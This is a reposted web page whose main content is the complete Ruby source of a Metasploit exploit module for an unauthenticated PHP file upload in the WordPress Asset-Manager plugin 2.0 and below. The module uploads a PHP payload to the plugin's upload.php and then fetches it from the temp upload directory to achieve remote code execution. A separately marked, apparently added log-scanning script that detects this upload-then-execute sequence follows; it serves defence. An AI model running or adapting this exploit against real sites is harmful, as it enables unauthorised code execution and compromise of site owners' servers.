WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit vulnerability library, exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file uploads: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end

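A defender-side check for the request pattern this module produces, added here as an example that is not part of the original post or of the Metasploit module: it scans web server access logs in Combined Log Format for a POST to the plugin's upload.php followed, from the same client within a short window, by a GET for a .php file under wp-content/uploads/assets/temp/. The log lines and client addresses are constructed; the two paths are the ones the module requests.

```ruby
# Added example (not part of the original post or the Metasploit module):
# flag the upload-then-execute sequence in web server access logs.
# Sample log lines below are constructed; paths are those the module uses.
require 'time'

UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/\s?]+\.php}

# Combined Log Format: client, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4], status: m[5].to_i }
end

# Returns one finding per GET of a .php file in the temp upload directory that
# follows a successful (HTTP 200, as the module checks) POST to upload.php from
# the same client within `window` seconds. Unparseable lines are skipped.
def detect_asset_manager_abuse(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }   # client ip => upload timestamps
  findings = []
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_PATH && e[:status] == 200
      uploads[e[:ip]] << e[:time]
    elsif e[:method] == 'GET' && e[:path] =~ TEMP_PHP
      hit = uploads[e[:ip]].find { |t| (e[:time] - t).between?(0, window) }
      findings << { ip: e[:ip], path: e[:path], status: e[:status] } if hit
    end
  end
  findings
end

# Constructed sample: one upload-then-execute sequence, two benign requests.
SAMPLE_LOG = [
  '203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5123',
  '203.0.113.7 - - [31/Dec/2012:09:20:03 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87',
  '203.0.113.7 - - [31/Dec/2012:09:20:04 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 200 0',
  '198.51.100.2 - - [31/Dec/2012:09:25:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 4410',
  '198.51.100.9 - - [31/Dec/2012:09:26:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/a.php HTTP/1.1" 404 210',
]

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG).each do |f|
    puts "suspicious: #{f[:ip]} fetched #{f[:path]} (HTTP #{f[:status]}) after POST to upload.php"
  end
end
```

A lone GET for a .php file in the temp directory (last sample line) is not flagged on its own; the check requires the preceding upload from the same client, which keeps noise from scanners low while still catching the module's two-step sequence.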